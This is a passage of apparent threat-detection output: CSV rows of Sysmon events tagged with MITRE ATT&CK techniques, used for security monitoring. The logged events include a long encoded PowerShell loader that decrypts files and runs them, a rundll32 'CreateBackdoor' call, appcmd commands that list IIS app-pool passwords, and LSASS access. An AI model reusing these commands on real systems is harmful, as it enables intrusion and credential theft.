wB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243552 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.397 747F3D96-9F69-5E75-0000-001033922000 6572 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 27 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:34.629 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\hid.dll 6.1.7600.16385 (win7_rtm.090713-1255) Hid User Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 27 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:34.629 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\hid.dll 6.1.7600.16385 (win7_rtm.090713-1255) Hid User Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5892 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.420 365ABB72-3D6D-5CEB-0000-0010576BFF00 2928 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 244341 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 12:36:03.899 747F3D96-0A33-5E76-0000-0010B8813D00 3696 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-069C-5E76-0000-0020E7030000 0x3e7 0 System SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-08DA-5E76-0000-001054382E00 2632 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine ("C:\Users\IEUser\Desktop\info.rar\jjs.exe") in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 4863 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-26 04:01:43.557 365ABB72-0FA7-5CEA-0000-001064C60A00 3908 C:\Windows\System32\svchost.exe 6.1.7600.16385 (win7_rtm.090713-1255) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\svchost.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-8DBD-5CEA-0000-0020E7030000 0x3e7 0 System SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE 365ABB72-0FA6-5CEA-0000-0010FEC30A00 3884 C:\Users\IEUser\Desktop\info.rar\jjs.exe "C:\Users\IEUser\Desktop\info.rar\jjs.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1," 1 5 4 1 0 0x8000000000000000 4863 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-26 04:01:43.557 365ABB72-0FA7-5CEA-0000-001064C60A00 3908 C:\Windows\System32\svchost.exe 6.1.7600.16385 (win7_rtm.090713-1255) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\svchost.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-8DBD-5CEA-0000-0020E7030000 0x3e7 0 System SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE 365ABB72-0FA6-5CEA-0000-0010FEC30A00 3884 C:\Users\IEUser\Desktop\info.rar\jjs.exe "C:\Users\IEUser\Desktop\info.rar\jjs.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 26 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:34.418 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\samlib.dll 6.1.7601.23677 (win7sp1_ldr.170209-0600) SAM Library DLL Microsoft® Windows® Operating System Microsoft Corporation SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 26 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:34.418 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\samlib.dll 6.1.7601.23677 (win7sp1_ldr.170209-0600) SAM Library DLL Microsoft® Windows® Operating System Microsoft Corporation SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243550 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.388 747F3D96-9F69-5E75-0000-001055912000 8160 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5889 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.310 365ABB72-3D6D-5CEB-0000-00109767FF00 3096 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243550 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.388 747F3D96-9F69-5E75-0000-001055912000 8160 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 244866 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 21:45:04.909 747F3D96-8AE0-5E76-0000-0010933B8003 7708 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\windows\system32\cmd.exe" c:\Users\Public\ MSEDGEWIN10\IEUser 747F3D96-06A4-5E76-0000-002087DE0200 0x2de87 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-06AA-5E76-0000-001046E10400 4668 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 17289 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-13 18:03:20.485 365ABB72-B167-5CD9-0000-001062160C00 2476 C:\Windows\System32\regsvr32.exe IEWIN7\IEUser tcp true false 10.0.2.15 IEWIN7 49159 false 151.101.128.133 443 https ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243550 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.388 747F3D96-9F69-5E75-0000-001055912000 8160 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 25 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:34.138 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cryptdll.dll 6.1.7600.16385 (win7_rtm.090713-1255) Cryptography Manager Microsoft® Windows® Operating System Microsoft Corporation SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 25 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:34.138 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 